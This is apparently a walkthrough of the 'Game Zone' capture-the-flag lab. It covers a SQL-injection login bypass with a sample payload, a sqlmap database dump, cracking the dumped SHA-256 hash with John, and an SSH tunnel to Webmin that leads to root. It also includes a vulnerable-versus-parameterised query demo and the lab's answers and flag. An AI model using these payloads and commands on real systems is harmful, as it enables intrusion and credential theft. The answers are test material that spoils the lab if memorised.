![[Pasted image 20250623224357.png]]

---

### Deploy the machine and access its web server.

### What is the name of the large cartoon avatar holding a sniper on the forum?

![[Pasted image 20250622235020.png]]
![[Pasted image 20250622235033.png]]

Performed a reverse image search and found the name of the character.

```text
Agent 47
```

### When you've logged in, what page do you get redirected to?

The `log in` field is vulnerable to SQL injection. A very basic SQLi bypasses the login authentication.

![[Pasted image 20250623000125.png]]
![[Pasted image 20250623000138.png]]

When logged in, you get redirected to the `/portal.php` page.

```bash
/portal.php
```

# SQLMAP

We're going to use `SQLMap` to dump the entire database for Game Zone, but first we need to intercept a request made to the search feature using Burp. Let's save this request into a text file. We can then pass it to SQLMap so it uses our authenticated user session.

![[Pasted image 20250623211454.png]]
![[Pasted image 20250623211630.png]]

```bash
root@ip-10-10-74-233:~/Desktop# cat request.txt
POST /portal.php HTTP/1.1
Host: 10.10.116.19
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://10.10.116.19
Connection: keep-alive
Referer: http://10.10.116.19/portal.php
Cookie: PHPSESSID=nqsldq9v584ogq3orqq5oah855
Upgrade-Insecure-Requests: 1
Priority: u=0, i
```

`sqlmap -r request.txt --dbms=mysql --dump`

- `-r`: use the intercepted request you saved earlier
- `--dbms`: tells SQLMap what type of database management system it is
- `--dump`: attempts to output the entire database

SQLMap will now try different injection techniques and identify the one the parameter is vulnerable to. Eventually, it will output the database.
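To show why the login form above could be bypassed with a basic SQLi, here is an added example (not code from the room or the write-up) that builds a constructed stand-in for the users table in SQLite, puts a string-concatenated login query beside a parameterised one, and runs the textbook tautology payload against both. The table schema, column names and the `sha256_hex` helper are assumptions; the page does not show the real schema.

```python
import hashlib
import sqlite3

# Constructed stand-in for the Game Zone users table (schema is assumed).
# Passwords are stored as unsalted SHA-256 hex, as the dump later showed.
def sha256_hex(text):
    return hashlib.sha256(text.encode()).hexdigest()

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    con.execute("INSERT INTO users VALUES (?, ?)",
                ("agent47", sha256_hex("videogamer124")))
    return con

def login_vulnerable(con, username, password):
    # User input is formatted straight into the SQL text, so a quote in the
    # username closes the literal and everything after it is parsed as SQL.
    sql = ("SELECT username FROM users WHERE username = '%s' AND pwd = '%s'"
           % (username, sha256_hex(password)))
    row = con.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(con, username, password):
    # Parameterised query: the driver binds input as data, never as SQL.
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND pwd = ?",
        (username, sha256_hex(password))).fetchone()
    return row[0] if row else None

# The "very basic SQLi": a tautology plus a comment that drops the password
# check. The trailing space matters; "--" must be followed by whitespace.
BYPASS = "' OR 1=1 -- "

def demo():
    con = make_db()
    return {
        "vulnerable_bypass": login_vulnerable(con, BYPASS, "anything"),
        "safe_bypass": login_safe(con, BYPASS, "anything"),
        "safe_real_creds": login_safe(con, "agent47", "videogamer124"),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The vulnerable function returns `agent47` for the payload without knowing any password; the parameterised one returns nothing for the same input and only succeeds with the real credentials.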
![[Pasted image 20250623211945.png]]
![[Pasted image 20250623213318.png]]

### In the users table, what is the hashed password?

```
ab5db...
```

### What was the username associated with the hashed password?

```bash
agent47
```

### What was the other table name?

```bash
post
```

### What is the de-hashed password?

```bash
videogamer124
```

```bash
root@ip-10-10-74-233:~/Desktop# echo "ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14" > hash.txt
root@ip-10-10-74-233:~/Desktop# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 256/256 AVX2 8x])
Warning: poor OpenMP scalability for this hash type, consider --fork=2
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
videogamer124    (?)
1g 0:00:00:00 DONE (2025-06-24 03:43) 1.190g/s 3471Kp/s 3471Kc/s 3471KC/s vimivera..veluasan
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed.
```

### What is the user flag?

```bash
649ac17b1480ac13ef1e4fa579dac95c
```

```bash
root@ip-10-10-74-233:~/Desktop# ssh agent47@10.10.116.19
agent47@10.10.116.19's password:
```

```bash
agent47@gamezone:~$ whoami
agent47
agent47@gamezone:~$ ls
user.txt
agent47@gamezone:~$ cat user.txt
649ac17b1480ac13ef1e4fa579dac95c
```

---

Reverse SSH port forwarding specifies that the given port on the remote server host is to be forwarded to the given host and port on the local side.

`-L` is a local tunnel (`YOU <- Client`). If a site was blocked, you can forward the traffic through a server you own and view it. For example, if imgur was blocked at work, you could run `ssh -L 9000:imgur.com:80 [email protected]`. Going to `localhost:9000` on your machine will then load imgur traffic through your other server.

`-R` is a remote tunnel (`YOU -> Client`). You forward your traffic to the other server for others to view.

### How many TCP sockets are running?
```bash
5
```

![[Pasted image 20250623215504.png]]

We can see that a service running on port 10000 is blocked from the outside by a firewall rule. However, using an SSH tunnel we can expose the port to ourselves locally. From our local machine, run `ssh -L 10000:localhost:10000 <username>@<IP>`. Once connected, type `localhost:10000` into your browser and you can access the newly exposed web server.

```bash
root@ip-10-10-74-233:~/Desktop# ssh -L 10000:localhost:10000 agent47@10.10.116.19
agent47@10.10.116.19's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

109 packages can be updated.
68 updates are security updates.

Last login: Mon Jun 23 22:03:19 2025 from 10.10.116.19
agent47@gamezone:~$
```

### What is the name of the exposed CMS?

```bash
webmin
```

![[Pasted image 20250623221033.png]]

### What is the CMS version?

```bash
1.580
```

I've reused the creds I found earlier, `agent47:videogamer124`, and I successfully logged into the Webmin server.

![[Pasted image 20250623222013.png]]

# Privilege Escalation

After adjusting the settings of the exploit, I was able to have a session as root!

![[Pasted image 20250623222255.png]]
![[Pasted image 20250623224157.png]]